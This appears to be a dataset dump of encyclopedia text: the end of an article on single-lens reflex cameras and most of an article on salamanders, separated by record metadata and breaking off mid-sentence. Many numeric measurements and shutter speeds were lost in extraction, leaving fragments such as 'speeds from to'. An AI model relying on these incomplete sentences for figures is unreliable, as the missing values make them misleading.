later by Panasonic and Leica. Contax came out with a DSLR model, the Contax N-Digital. This model was too late and too expensive to be competitive with other camera manufacturers. The Contax N-digital was the last Contax to use that maker's lens system, and the camera, while having impressive features such as a full-frame sensor, was expensive and lacked sufficient write-speed to the memory card for it to be seriously considered by some professional photographers. The digital single-lens reflex camera have largely replaced film SLRs design in convenience, sales and popularity at the start of the 21st century. Optical components A cross-section (or 'side-view') of the optical components of a typical SLR camera shows how the light passes through the lens assembly, is reflected by the mirror placed at a 45-degree angle, and is projected on the matte focusing screen. Via a condensing lens and internal reflections in the roof pentaprism the image appears in the eyepiece. When an image is taken, the mirror moves upwards from its resting position in the direction of the arrow, the focal plane shutter opens, and the image is projected onto the film or sensor in exactly the same manner as on the focusing screen. This feature distinguishes SLRs from other cameras as the photographer sees the image composed exactly as it will be captured on the film or sensor. Most 35 mm SLRs use a roof pentaprism or penta-mirror to direct the light to the eyepiece, first used on the 1948 Duflex constructed by Jenő Dulovits and patented August 1943 (Hungary). With this camera also appeared the first instant-return mirror. The first Japanese pentaprism SLR was the 1955 Miranda T, followed by the Asahi Pentax, Minolta SR-2, Zunow, Nikon F and the Yashica Pentamatic. Some SLRs offered removable pentaprisms with optional viewfinder capabilities, such as the waist-level finder, the interchangeable sports finders used on the Canon F1 and F1n; the Nikon F, F2, F3, F4 and F5; and the Pentax LX. Another prism design was the porro prism system used in the Olympus Pen F, the Pen FT, the Pen FV half-frame 35 mm SLR cameras. This was later used on the Olympus EVOLT E-3x0 series, the Leica Digilux 3 and the Panasonic DMC-L1. A right-angle finder is available that slips onto the eyepiece of most SLRs and D-SLRs and allows viewing through a waist-level viewfinder. There is also a finder that provides EVF remote capability. Shutter mechanisms Almost all contemporary SLRs use a focal-plane shutter located in front of the film plane, which prevents the light from reaching the film even if the lens is removed, except when the shutter is actually released during the exposure. There are various designs for focal plane shutters. Early focal-plane shutters designed from the 1930s onwards usually consisted of two curtains that travelled horizontally across the film gate: an opening shutter curtain followed by a closing shutter curtain. During fast shutter speeds, the focal-plane shutter would form a 'slit' whereby the second shutter curtain was closely following the first opening shutter curtain to produce a narrow, vertical opening, with the shutter slit moving horizontally. The slit would get narrower as shutter speeds were increased. Initially these shutters were made from a cloth material (which was in later years often rubberised), but some manufacturers used other materials instead. Nippon Kōgaku (now Nikon Corporation), for example, used titanium foil shutters for several of their flagship SLR cameras, including the Nikon F, F2, and F3. Other focal-plane shutter designs, such as the Copal Square, travelled vertically — the shorter travelling distance of 24 millimetres (as opposed to 36 mm horizontally) meant that minimum exposure and flash synchronisation times could be reduced. These shutters are usually manufactured from metal, and use the same moving-slit principle as horizontally travelling shutters. They differ, though, in usually being formed of several slats or blades, rather than single curtains as with horizontal designs, as there is rarely enough room above and below the frame for a one-piece shutter. Vertical shutters became very common in the 1980s (though Konica, Mamiya, and Copal first pioneered their use in the 1950s and 1960s, and are almost exclusively used for new cameras. Nikon used Copal-made vertical plane shutters in their Nikomat/Nikkormat -range, enabling x-sync speeds from to while the only choice for focal plane shutters at that time was . Later, Nikon again pioneered the use of titanium for vertical shutters, using a special honeycomb pattern on the blades to reduce their weight and achieve world-record speeds in 1982 of second for non-sync shooting, and with x-sync. Nowadays most such shutters are manufactured from cheaper aluminium (though some high-end cameras use materials such as carbon-fibre and Kevlar). Another shutter system is the leaf shutter, whereby the shutter is constructed of diaphragm-like blades and can be situated either between the lens or behind the lens. If the shutter is part of a lens assembly some other mechanism is required to ensure that no light reaches the film between exposures. An example of a behind-the-lens leaf shutter is found in the 35 mm SLRs produced by Kodak, with their Retina Reflex camera line; Topcon, with their Auto 100; and Kowa with their SE-R and SET-R reflexes. A primary example of a medium-format SLR with a between-the-lens leaf shutter system would be Hasselblad, with their 500C, 500 cm, 500 EL-M (a motorized Hasselblad) and other models (producing a 6 cm square negative). Hasselblads use an auxiliary shutter blind situated behind the lens mount and the mirror system to prevent the fogging of film. Other medium-format SLRs also using leaf shutters include the now discontinued Zenza-Bronica camera system lines such as the Bronica ETRs, the ETRs'i (both producing a 6 × 4.5 cm. image), the SQ and the SQ-AI (producing a 6 × 6 cm image like the Hasselblad), and the Zenza-Bronica G system (6 × 7 cm). Certain Mamiya medium-format SLRs, discontinued camera systems such as the Kowa 6 and a few other camera models also used between-the-lens leaf shutters in their lens systems. Thus, any time a photographer purchased one of these lenses, that lens included a leaf shutter in its lens mount. Because leaf shutters synchronized electronic flash at all shutter speeds especially at fast shutter speeds of of a second or faster, cameras using leaf shutters were more desirable to studio photographers who used sophisticated studio electronic flash systems. Some manufacturers of medium-format 120 film SLR cameras also made leaf-shutter lenses for their focal-plane-shutter models. Rollei made at least two such lenses for their Rolleiflex SL-66 medium format which was a focal-plane shutter SLR. Rollei later switched to a camera system of leaf-shutter design (e.g., the 6006 and 6008 reflexes) and their current medium-format SLRs are now all of the between-the-lens shutter design. Further developments Since the technology became widespread in the 1970s, SLRs have become the main photographic instrument used by dedicated amateur photographers and professionals. Some photographers of static subjects (such as architecture, landscape, and some commercial subjects), however, prefer view cameras because of the capability to control perspective. With a triple-extension bellows 4" × 5" camera such as the Linhof SuperTechnika V, the photographer can correct certain distortions such as "keystoning", where the image 'lines' converge (i.e., photographing a building by pointing a typical camera upward to include the top of the building). Perspective correction lenses are available in the 35 mm and medium formats to correct this distortion with film cameras, and it can also be corrected after the fact with photo software when using digital cameras. The photographer can also extend the bellows to its full length, tilt the front standard and perform photomacrography (commonly known as 'macro photography'), producing a sharp image with depth-of-field without stopping down the lens diaphragm. Film formats Early SLRs were built for large format photography, but this film format has largely lost favor among professional photographers. SLR film-based cameras have been produced for most film formats as well as for digital formats. These film-based SLRs use the 35 mm format as, this film format offers a variety of emulsions and film sensitivity speeds, usable image quality and a good market cost. 35 mm film comes in a variety of exposure lengths: 20 exposure, 24 exposure and 36 exposure rolls. Medium format SLRs provide a higher-quality image with a negative that can be more easily retouched than the smaller 35 mm negative, when this capability is required. A small number of SLRs were built for APS such as the Canon IX series and the Nikon Pronea cameras. SLRs were also introduced for film formats as small as Kodak's 110, such as the Pentax Auto 110, which had interchangeable lenses. The Narciss camera is an all-metal 16 mm subminiature single lens reflex camera made by Russian optic firm Krasnogorsky Mekhanichesky Zavod (KMZ) Narciss (Soviet Union; Нарцисс) between 1961 and 1965. Common features Other features found on many SLR cameras include through-the-lens (TTL) metering and sophisticated flash control referred to as "dedicated electronic flash". In a dedicated system, once the dedicated electronic flash is inserted into the camera's hot shoe and turned on, there is then communication between camera and flash. The camera's synchronization speed is set, along with the aperture. Many camera models measure the light that reflects off of the film plane, which controls the flash duration of the electronic flash. This is denoted TTL flash metering. Some electronic flash units can send out several short bursts of light to aid the autofocus system or for wireless communication with off-camera flash units. A pre-flash is often used to determine the amount of light that is reflected from the subject, which sets the duration of the main flash at time of exposure. Some cameras also employ automatic fill-flash, where the flash light and the available light are balanced. While these capabilities are not unique to the SLR, manufacturers included them early on in the top models, whereas the best rangefinder cameras adopted such features later. Design considerations Many of the advantages of SLR cameras derive from viewing and focusing the image through the attached lens. Most other types of cameras do not have this function; subjects are seen through a viewfinder that is near the lens, making the photographer's view different from that of the lens. SLR cameras provide photographers with precision; they provide a viewing image that will be exposed onto the negative exactly as it is seen through the lens. There is no parallax error, and exact focus can be confirmed by eye—especially in macro photography and when photographing using long focus lenses. The depth of field may be seen by stopping down to the attached lens aperture, which is possible on most SLR cameras except for the least expensive models. Because of the SLR's versatility, most manufacturers have a vast range of lenses and accessories available for them. Compared to most fixed-lens compact cameras, the most commonly used and inexpensive SLR lenses offer a wider aperture range and larger maximum aperture (typically to for a 50 mm lens). This allows photographs to be taken in lower light conditions without flash, and allows a narrower depth of field, which is useful for blurring the background behind the subject, making the subject more prominent. "Fast" lenses are commonly used in theater photography, portrait photography, surveillance photography, and all other photography requiring a large maximum aperture. The variety of lenses also allows for the camera to be used and adapted in many different situations. This provides the photographer with considerably more control (i.e., how the image is viewed and framed) than would be the case with a view camera. In addition, some SLR lenses are manufactured with extremely long focal lengths, allowing a photographer to be a considerable distance away from the subject and yet still expose a sharp, focused image. This is particularly useful if the subject includes dangerous animals (e.g., wildlife); the subject prefers anonymity to being photographed; or else, the photographer's presence is unwanted (e.g., celebrity photography or surveillance photography). Practically all SLR and DSLR camera bodies can also be attached to telescopes and microscopes via an adapter tube to further enhance their imaging capabilities. In most cases, single-lens reflex cameras cannot be made as small or as light as other camera designs—such as rangefinder cameras, autofocus compact cameras and digital cameras with electronic viewfinders (EVF)—owing to the mirror box and pentaprism/pentamirror. The mirror box also prevents lenses with deeply recessed rear elements from being mounted close to the film or sensor unless the camera has a mirror lockup feature; this means that simple designs for wide angle lenses cannot be used. Instead, larger and more complex retrofocus designs are required. The SLR mirror 'blacks-out' the viewfinder image during the exposure. In addition, the movement of the reflex mirror takes time, limiting the maximum shooting speed. The mirror system can also cause noise and vibration. Partially reflective (pellicle) fixed mirrors avoid these problems and have been used in a very few designs including the Canon Pellix and the Canon EOS-1N RS, but these designs introduce their own problems. These pellicle mirrors reduce the amount of light travelling to the film plane or sensor and also can distort the light passing through them, resulting in a less-sharp image. To avoid the noise and vibration, many professional cameras offer a mirror lock-up feature, however, this feature totally disables the SLR's automatic focusing ability. Electronic viewfinders have the potential to give the 'viewing-experience' of a DSLR (through-the-lens viewing) without many of the disadvantages. More recently, Sony have resurrected the pellicle mirror concept in their "single-lens translucent" (SLT) range of cameras. SLRs vary widely in their construction and typically have bodies made of plastic or magnesium. Most manufacturers do not cite durability specifications, but some report shutter life expectancies for professional models. For instance, the Canon EOS 1Ds MkII is rated for 200,000 shutter cycles and the Nikon D3 is rated for 300,000 with its exotic carbon fiber/kevlar shutter. Because many SLRs have interchangeable lenses, there is a tendency for dust, sand and dirt to get into the main body of the camera through the mirror box when the lens is removed, thus dirtying or even jamming the mirror movement mechanism or the shutter curtain mechanism itself. In addition, these particles can also jam or otherwise hinder the focusing feature of a lens if they enter into the focusing helicoid. The problem of sensor cleaning has been somewhat reduced in DSLRs as some cameras have a built-in sensor cleaning unit. The price of SLRs in general also tends to be somewhat higher than that of other types of cameras, owing to their internal complexity. This is compounded by the expense of additional components, such as flashes or lenses. The initial investment in equipment can be prohibitive enough to keep some casual photographers away from SLRs, although the market for used SLRs has become larger particularly as photographers migrate to digital systems. Future The digital single-lens reflex camera has largely replaced the film SLR for its convenience, sales, and popularity at the start of the 21st century. These cameras were the marketing favorite among advanced amateur and professional photographers through the first two decades of the 2000s. Around 2010, the mirrorless technology utilized in point and shoot cameras made the way to the interchangeable lens cameras and slowly replaced DSLR technology. As of 2022, all the major camera brands (Except Pentax) ceased development and production of DSLRs and moved on to mirrorless systems. These systems offer multiple advantages to the photographer with regards to autofocus systems as well as the ability to update the lens technologies due to the reduced distance between the back of the lens and the sensor resulting from the removal of the mirror. Film-based SLRs are still used by a niche market of enthusiasts and format lovers.
Technology
Photography
null
29657
https://en.wikipedia.org/wiki/Salamander
Salamander
Salamanders are a group of amphibians typically characterized by their lizard-like appearance, with slender bodies, blunt snouts, short limbs projecting at right angles to the body, and the presence of a tail in both larvae and adults. All ten extant salamander families are grouped together under the order Urodela from the group Caudata. Urodela is a scientific Latin term based on the Ancient Greek : ourà dēlē "conspicuous tail". Caudata is the Latin for "tailed ones", from : "tail". Salamander diversity is highest in eastern North America, especially in the Appalachian Mountains; most species are found in the Holarctic realm, with some species present in the Neotropical realm. Salamanders never have more than four toes on their front legs and five on their rear legs, but some species have fewer digits and others lack hind limbs. Their permeable skin usually makes them reliant on habitats in or near water or other cool, damp places. Some salamander species are fully aquatic throughout their lives, some take to the water intermittently, and others are entirely terrestrial as adults. This group of amphibians is capable of regenerating lost limbs as well as other damaged parts of their bodies. Researchers hope to reverse engineer the regenerative processes for potential human medical applications, such as brain and spinal cord injury treatment or preventing harmful scarring during heart surgery recovery. The remarkable ability of salamanders to regenerate is not just limited to limbs but extends to vital organs such as the heart, jaw, and parts of the spinal cord, showing their uniqueness compared to different types of vertebrates. ⁤⁤This ability is most remarkable for occurring without any type of scarring. ⁤⁤This has made salamanders an invaluable model organism in scientific research aimed at understanding and achieving regenerative processes for medical advancements in human and animal biology. Members of the family Salamandridae are mostly known as newts and lack the costal grooves along the sides of their bodies typical of other groups. The skin of some species contains the powerful poison tetrodotoxin; these salamanders tend to be slow-moving and have bright warning coloration to advertise their toxicity. Salamanders typically lay eggs in water and have aquatic larvae, but great variation occurs in their lifecycles. Some species in harsh environments reproduce while still in the larval state. Etymology The word salamander comes from Old French salamandre from Latin salamandra from Greek : salamándra, of uncertain, possibly, pre-Greek origin. The Greek word is used for the fire salamander. Description The skin lacks scales and is moist and smooth to the touch, except in newts of the Salamandridae, which may have velvety or warty skin, wet to the touch. The skin may be drab or brightly colored, exhibiting various patterns of stripes, bars, spots, blotches, or dots. Male newts become dramatically colored during the breeding season. Cave species dwelling in darkness lack pigmentation and have a translucent pink or pearlescent appearance. Salamanders range in size from the minute salamanders, with a total length of , including the tail, to the Chinese giant salamander which reaches and weighs up to . All the largest species are found in the four families giant salamanders, sirens, Congo eels and Proteidae, who are all aquatic and obligate paedomorphs. Some of the largest terrestrial salamanders, which goes through full metamorphosis, belongs to the family of Pacific giant salamanders, and are much smaller. Most salamanders are between in length. Trunk, limbs and tail An adult salamander generally resembles a small lizard, having a basal tetrapod body form with a cylindrical trunk, four limbs, and a long tail. Except in the family Salamandridae, the head, body, and tail have a number of vertical depressions in the surface which run from the mid-dorsal region to the ventral area and are known as costal grooves. Their function seems to be to help keep the skin moist by channeling water over the surface of the body. Some aquatic species, such as sirens and amphiumas, have reduced or absent hind limbs, giving them an eel-like appearance, but in most species, the front and rear limbs are about the same length and project sideward, barely raising the trunk off the ground. The feet are broad with short digits, usually four on the front feet and five on the rear. Salamanders do not have claws, and the shape of the foot varies according to the animal's habitat. Climbing species have elongated, square-tipped toes, while rock-dwellers have larger feet with short, blunt toes. The tree-climbing salamander (Bolitoglossa sp.) has plate-like webbed feet which adhere to smooth surfaces by suction, while the rock-climbing Hydromantes species from California have feet with fleshy webs and short digits and use their tails as an extra limb. When ascending, the tail props up the rear of the body, while one hind foot moves forward and then swings to the other side to provide support as the other hind foot advances. In larvae and aquatic salamanders, the tail is laterally flattened, has dorsal and ventral fins, and undulates from side to side to propel the animal through the water. In the families Ambystomatidae and Salamandridae, the male's tail, which is larger than that of the female, is used during the amplexus embrace to propel the mating couple to a secluded location. In terrestrial species, the tail moves to counterbalance the animal as it runs, while in the arboreal salamander and other tree-climbing species, it is prehensile. The tail is also used by certain plethodontid salamanders that can jump, to help launch themselves into the air. The tail is used in courtship and as a storage organ for proteins and lipids. It also functions as a defense against predation, when it may be lashed at the attacker or autotomised when grabbed. Unlike frogs, an adult salamander is able to regenerate limbs and its tail when these are lost. Skin The skin of salamanders, in common with other amphibians, is thin, permeable to water, serves as a respiratory membrane, and is well-supplied with glands. It has highly cornified outer layers, renewed periodically through a skin shedding process controlled by hormones from the pituitary and thyroid glands. During moulting, the skin initially breaks around the mouth, and the animal moves forward through the gap to shed the skin. When the front limbs have been worked clear, a series of body ripples pushes the skin toward the rear. The hind limbs are extracted and push the skin farther back, before it is eventually freed by friction as the salamander moves forward with the tail pressed against the ground. The animal often then eats the resulting sloughed skin. Glands in the skin discharge mucus which keeps the skin moist, an important factor in skin respiration and thermoregulation. The sticky layer helps protect against bacterial infections and molds, reduces friction when swimming, and makes the animal slippery and more difficult for predators to catch. Granular glands scattered on the upper surface, particularly the head, back, and tail, produce repellent or toxic secretions. Some salamander toxins are particularly potent. The rough-skinned newt (Taricha granulosa) produces the neurotoxin tetrodotoxin, the most toxic nonprotein substance known. Handling the newts does no harm, but ingestion of even a minute fragment of skin is deadly. In feeding trials, fish, frogs, reptiles, birds, and mammals were all found to be susceptible. Mature adults of some salamander species have "nuptial" glandular tissue in their cloacae, at the base of their tails, on their heads or under their chins. Some females release chemical substances, possibly from the ventral cloacal gland, to attract males, but males do not seem to use pheromones for this purpose. In some plethodonts, males have conspicuous mental glands on the chin which are pressed against the females' nostrils during the courtship ritual. They may function to speed up the mating process, reducing the risk of its being disrupted by a predator or rival male. The gland at the base of the tail in Plethodon cinereus is used to mark fecal pellets to proclaim territorial ownership. Senses Smell Olfaction in salamanders plays a role in territory maintenance, the recognition of predators, and courtship rituals, but is probably secondary to sight during prey selection and feeding. Salamanders have two types of sensory areas that respond to the chemistry of the environment. Olfactory epithelium in the nasal cavity picks up airborne and aquatic odors, while adjoining vomeronasal organs detect nonvolatile chemical cues, such as tastes in the mouth. In plethodonts, the sensory epithelium of the vomeronasal organs extends to the nasolabial grooves, which stretch from the nostrils to the corners of the mouth. These extended areas seem to be associated with the identification of prey items, the recognition of conspecifics, and the identification of individuals. Vision The eyes of most salamanders are adapted primarily for vision at night. In some permanently aquatic species, they are reduced in size and have a simplified retinal structure, and in cave dwellers such as the Georgia blind salamander, they are absent or covered with a layer of skin. In amphibious species, the eyes are a compromise and are nearsighted in air and farsighted in water. Fully terrestrial species such as the fire salamander have a flatter lens which can focus over a much wider range of distances. To find their prey, salamanders use trichromatic color vision extending into the ultraviolet range, based on three photoreceptor types that are maximally sensitive around 450, 500, and 570 nm. The larvae, and the adults of some highly aquatic species, also have a lateral line organ, similar to that of fish, which can detect changes in water pressure. Hearing All salamanders lack middle ear cavity, eardrum and eustachian tube, but have an opercularis system like frogs, and are still able to detect airborne sound. The opercularis system consists of two ossicles: the columella (equivalent to the stapes of higher vertebrates) which is fused to the skull, and the operculum. An opercularis muscle connects the latter to the pectoral girdle, and is kept under tension when the animal is alert. The system seems able to detect low-frequency vibrations (500–600 Hz), which may be picked up from the ground by the fore limbs and transmitted to the inner ear. These may serve to warn the animal of an approaching predator. Vocalization Salamanders are usually considered to have no voice and do not use sound for communication in the way that frogs do. Before mating, they communicate by pheromone signaling; some species make quiet ticking, clicking, squeaks or popping noises, perhaps by the opening and closing of valves in the nose. Most salamanders lack vocal cords, but a larynx is present in the mudpuppy (Necturus) and some other species, and the Pacific giant salamanders and a few others have a large larynx and bands known as plicae vocales. The California giant salamander can produce a bark or rattle, and a few species can squeak by contracting muscles in the throat. The arboreal salamander can squeak using a different mechanism; it retracts its eyes into its head, forcing air out of its mouth. The ensatina salamander occasionally makes a hissing sound, while the sirens sometimes produce quiet clicks, and can resort to faint shrieks if attacked. Similar clicking behaviour was observed in two European newts Lissotriton vulgaris and Ichthyosaura alpestris in their aquatic phase. Vocalization in salamanders has been little studied and the purpose of these sounds is presumed to be the startling of predators. Respiration Respiration differs among the different species of salamanders, and can involve gills, lungs, skin, and the membranes of mouth and throat. Larval salamanders breathe primarily by means of gills, which are usually external and feathery in appearance. Water is drawn in through the mouth and flows out through the gill slits. Some neotenic species such as the mudpuppy (Necturus maculosus) retain their gills throughout their lives, but most species lose them at metamorphosis. The embryos of some terrestrial lungless salamanders, such as Ensatina, that undergo direct development, have large gills that lie close to the egg's surface. When present in adult salamanders, lungs vary greatly among different species in size and structure. In aquatic, cold-water species like the torrent salamanders (Rhyacotriton), the lungs are very small with smooth walls, while species living in warm water with little dissolved oxygen, such as the lesser siren (Siren intermedia), have large lungs with convoluted surfaces. In the lungless salamanders (family Plethodontidae and the clawed salamanders in the family of Asiatic salamanders), no lungs or gills are present, and gas exchange mostly takes place through the skin, known as cutaneous respiration, supplemented by the tissues lining the mouth. To facilitate this, these salamanders have a dense network of blood vessels just under the skin and in the mouth. In the amphiumas, metamorphosis is incomplete, and they retain one pair of gill slits as adults, with fully functioning internal lungs. Some species that lack lungs respire through gills. In most cases, these are external gills, visible as tufts on either side of the head. Some terrestrial salamanders have lungs used in respiration, although these are simple and sac-like, unlike the more complex organs found in mammals. Many species, such as the olm, have both lungs and gills as adults. In the Necturus, external gills begin to form as a means of combating hypoxia in the egg as egg yolk is converted into metabolically active tissue. Molecular changes in the mudpuppy during post-embryonic development primarily due to the thyroid gland prevent the internalization of the external gills as seen in most salamanders that undergo metamorphosis. The external gills seen in salamanders differs greatly from that of amphibians with internalized gills. Unlike amphibians with internalized gills which typically rely on the changing of pressures within the buccal and pharyngeal cavities to ensure diffusion of oxygen onto the gill curtain, neotenic salamanders such as Necturus use specified musculature, such as the levatores arcuum, to move external gills to keep the respiratory surfaces constantly in contact with new oxygenated water. Feeding and diet Salamanders are opportunistic predators. They are generally not restricted to specific foods, but feed on almost any organism of a reasonable size. Large species such as the Japanese giant salamander (Andrias japonicus) eat crabs, fish, small mammals, amphibians, and aquatic insects. In a study of smaller dusky salamanders (Desmognathus) in the Appalachian Mountains, their diet includes earthworms, flies, beetles, beetle larvae, leafhoppers, springtails, moths, spiders, grasshoppers, and mites. Cannibalism sometimes takes place, especially when resources are short or time is limited. Tiger salamander tadpoles in ephemeral pools sometimes resort to eating each other, and are seemingly able to target unrelated individuals. Adult blackbelly salamanders (Desmognathus quadramaculatus) prey on adults and young of other species of salamanders, while their larvae sometimes cannibalise smaller larvae. Most species of salamander have small teeth in both their upper and lower jaws. Unlike frogs, even the larvae of salamanders possess these teeth. Although larval teeth are shaped like pointed cones, the teeth of adults are adapted to enable them to readily grasp prey. The crown, which has two cusps (bicuspid), is attached to a pedicel by collagenous fibers. The joint formed between the bicuspid and the pedicel is partially flexible, as it can bend inward, but not outward. When struggling prey is advanced into the salamander's mouth, the teeth tips relax and bend in the same direction, encouraging movement toward the throat, and resisting the prey's escape. Many salamanders have patches of teeth attached to the vomer and the palatine bones in the roof of the mouth, and these help to retain prey. All types of teeth are resorbed and replaced at intervals throughout the animal's life. A terrestrial salamander catches its prey by flicking out its sticky tongue in an action that takes less than half a second. In some species, the tongue is attached anteriorly to the floor of the mouth, while in others, it is mounted on a pedicel. It is rendered sticky by secretions of mucus from glands in its tip and on the roof of the mouth. High-speed cinematography shows how the tiger salamander (Ambystoma tigrinum) positions itself with its snout close to its prey. Its mouth then gapes widely, the lower jaw remains stationary, and the tongue bulges and changes shape as it shoots forward. The protruded tongue has a central depression, and the rim of this collapses inward as the target is struck, trapping the prey in a mucus-laden trough. Here it is held while the animal's neck is flexed, the tongue retracted and jaws closed. Large or resistant prey is retained by the teeth while repeated protrusions and retractions of the tongue draw it in. Swallowing involves alternate contraction and relaxation of muscles in the throat, assisted by depression of the eyeballs into the roof of the mouth. Many lungless salamanders of the family Plethodontidae have more elaborate feeding methods. Muscles surrounding the hyoid bone contract to store elastic energy in springy connective tissue, and actually "shoot" the hyoid bone out of the mouth, thus elongating the tongue. Muscles that originate in the pelvic region and insert in the tongue are used to reel the tongue and the hyoid back to their original positions. An aquatic salamander lacks muscles in the tongue, and captures its prey in an entirely different manner. It grabs the food item, grasps it with its teeth, and adopts a kind of inertial feeding. This involves tossing its head about, drawing water sharply in and out of its mouth, and snapping its jaws, all of which tend to tear and macerate the prey, which is then swallowed. Though frequently feeding on slow-moving animals like snails, shrimps and worms, sirenids are unique among salamanders for having developed herbivory speciations, such as beak-like jaw ends and extensive intestines. They feed on algae and other soft-plants in the wild, and easily eat offered lettuce. Defense Salamanders have thin skins and soft bodies, move rather slowly and might appear vulnerable to opportunistic predation, but have several effective lines of defense. Mucus coating on damp skin makes them difficult to grasp, and the slimy coating may have an offensive taste or be toxic. When attacked by a predator, a salamander may position itself to make the main poison glands face the aggressor. Often, these are on the tail, which may be waggled or turned up and arched over the animal's back. The sacrifice of the tail may be a worthwhile strategy, if the salamander escapes with its life and the predator learns to avoid that species of salamander in the future. Aposematism Skin secretions of the tiger salamander (Ambystoma tigrinum) fed to rats have been shown to produce aversion to the flavor, and the rats avoided the presentational medium when it was offered to them again. The fire salamander (Salamandra salamandra) has a ridge of large granular glands down its spine which are able to squirt a fine jet of toxic fluid at its attacker. By angling its body appropriately, it can accurately direct the spray for a distance of up to . The Iberian ribbed newt (Pleurodeles waltl) has another method of deterring aggressors. Its skin exudes a poisonous, viscous fluid and at the same time, the newt rotates its sharply pointed ribs through an angle between 27 and 92°, and adopts an inflated posture. This action causes the ribs to puncture the body wall, each rib protruding through an orange wart arranged in a lateral row. This may provide an aposematic signal that makes the spines more visible. When the danger has passed, the ribs retract and the skin heals. Camouflage and mimicry Although many salamanders have cryptic colors so as to be unnoticeable, others signal their toxicity by their vivid coloring. Yellow, orange, and red are the colors generally used, often with black for greater contrast. Sometimes, the animal postures if attacked, revealing a flash of warning hue on its underside. The red eft, the brightly colored terrestrial juvenile form of the eastern newt (Notophthalmus viridescens), is highly poisonous. It is avoided by birds and snakes, and can survive for up to 30 minutes after being swallowed (later being regurgitated). The red salamander (Pseudotriton ruber) is a palatable species with a similar coloring to the red eft. Predators that previously fed on it have been shown to avoid it after encountering red efts, an example of Batesian mimicry. Other species exhibit similar mimicry. In California, the palatable yellow-eyed salamander (Ensatina eschscholtzii) closely resembles the toxic California newt (Taricha torosa) and the rough-skinned newt (Taricha granulosa), whereas in other parts of its range, it is cryptically colored. A correlation exists between the toxicity of Californian salamander species and diurnal habits: relatively harmless species like the California slender salamander (Batrachoseps attenuatus) are nocturnal and are eaten by snakes, while the California newt has many large poison glands in its skin, is diurnal, and is avoided by snakes. Autotomy Some salamander species use tail autotomy to escape predators. The tail drops off and wriggles around for a while after an attack, and the salamander either runs away or stays still enough not to be noticed while the predator is distracted. The tail regrows with time, and salamanders routinely regenerate other complex tissues, including the lens or retina of the eye. Within only a few weeks of losing a piece of a limb, a salamander perfectly reforms the missing structure. Distribution and habitat Salamanders split off from the other amphibians during the mid- to late Permian, and initially were similar to modern members of the Cryptobranchoidea. Their resemblance to lizards is the result of symplesiomorphy, their common retention of the primitive tetrapod body plan, but they are no more closely related to lizards than they are to mammals. Their nearest relatives are the frogs and toads, within Batrachia. The oldest known total-group (Caudata) salamander is Triassurus from the Triassic of Kyrgyzstan. Further salamander fossils are known from the Middle Jurassic of England, Scotland, China, and Kazakhstan. The oldest known crown-group salamander (Urodela) remains uncertain but recent analyses suggest it is Valdotriton from the Late Jurassic of Spain. Salamanders are found only in the Holarctic and Neotropical regions, not reaching south of the Mediterranean Basin, the Himalayas, or in South America the Amazon Basin. They do not extend north of the Arctic tree line, with the northernmost Asian species, Salamandrella keyserlingii, which can survive long-term freezing at −55 °C, occurring in the Siberian larch forests of Sakha and the most northerly species in North America, Ambystoma laterale, reaching no farther north than Labrador and Taricha granulosa not beyond the Alaska Panhandle. They had an exclusively Laurasian distribution until Bolitoglossa invaded South America from Central America, probably by the start of the Early Miocene, about 23 million years ago. They also lived on the Caribbean Islands during the early Miocene epoch, confirmed by the discovery of Palaeoplethodon hispaniolae, found trapped in amber in the Dominican Republic. Vertebrae fossils recovered from the Murgon fossil site have been tentatively attributed to that of a Salamander, though its true identity is disputed. If the vertebrae truly belong to a Salamander, they would represent the only Salamanders in Australia. There are about 760 living species of salamander. One-third of the known salamander species are found in North America. The highest concentration of these is found in the Appalachian Mountains region, where the Plethodontidae are thought to have originated in mountain streams. Here, vegetation zones and proximity to water are of greater importance than altitude. Only species that adopted a more terrestrial mode of life have been able to disperse to other localities. The northern slimy salamander (Plethodon glutinosus) has a wide range and occupies a habitat similar to that of the southern gray-cheeked salamander (Plethodon metcalfi). The latter is restricted to the slightly cooler and wetter conditions in north-facing cove forests in the southern Appalachians, and to higher elevations above 900 m (3,000 ft), while the former is more adaptable, and would be perfectly able to inhabit these locations, but some unknown factor seems to prevent the two species from co-existing. One species, the Anderson's salamander, is one of the few species of living amphibians to occur in brackish or salt water. Reproduction and development Many salamanders do not use vocalisations, and in most species the sexes look alike, so they use olfactory and tactile cues to identify potential mates, and sexual selection occurs. Pheromones play an important part in the process and may be produced by the abdominal gland in males and by the cloacal glands and skin in both sexes. Males are sometimes to be seen investigating potential mates with their snouts. In Old World newts, Triturus spp., the males are sexually dimorphic and display in front of the females. Visual cues are also thought to be important in some Plethodont species. Except for terrestrial species in the three families Plethodontidae, Ambystomatidae, and Salamandridae, salamanders mate in water. The mating varies from courtship between a single male and female to explosive group breeding. In the clade Salamandroidea, which makes up about 90% of all species, fertilization is internal. As a general rule, salamanders with internal fertilization have indirect sperm transfer, but in species like the Sardinian brook salamander, the Corsican brook salamander, the Caucasian salamander and the Pyrenean brook salamander, the male transfer his sperm directly into the female cloaca. For the species with indirect sperm transfer, the male deposits a spermatophore on the ground or in the water according to species, and the female picks this up with her vent. The spermatophore has a packet of sperm supported on a conical gelatinous base, and often an elaborate courtship behavior is involved in its deposition and collection. Once inside the cloaca, the spermatozoa move to the spermatheca, one or more chambers in the roof of the cloaca, where they are stored for sometimes lengthy periods until the eggs are laid. In the Asiatic salamanders, the giant salamanders and Sirenidae, which are the most primitive groups, the fertilization is external. In a reproductive process similar to that of typical frogs, the male releases sperm onto the egg mass. These salamanders also have males that exhibit parental care, which otherwise only occur in females with internal fertilization. Three different types of egg deposition occur. Ambystoma and Taricha spp. spawn large numbers of small eggs in quiet ponds where many large predators are unlikely. Most dusky salamanders (Desmognathus) and Pacific giant salamanders (Dicamptodon) lay smaller batches of medium-sized eggs in a concealed site in flowing water, and these are usually guarded by an adult, normally the female. Many of the tropical climbing salamanders (Bolitoglossa) and lungless salamanders (Plethodontinae) lay a small number of large eggs on land in a well-hidden spot, where they are also guarded by the mother. Some species such as the fire salamanders (Salamandra) are ovoviviparous, with the female retaining the eggs inside her body until they hatch, either into larvae to be deposited in a water body, or into fully formed juveniles. In temperate regions, reproduction is usually seasonal and salamanders may migrate to breeding grounds. Males usually arrive first and in some instances set up territories. Typically, a larval stage follows in which the organism is fully aquatic. The tadpole has three pairs of external gills, no eyelids, a long body, a laterally flattened tail with dorsal and ventral fins and in some species limb-buds or limbs. Pond-type larvae may have a pair of rod-like balancers on either side of the head, long gill filaments and broad fins. Stream-type larvae are more slender with short gill filaments—in Rhyacotriton and Onychodactylus, and some species in Batrachuperus, the gills and gill rakers are extremely reduced, narrower fins and no balancers, but instead have hind limbs already developed 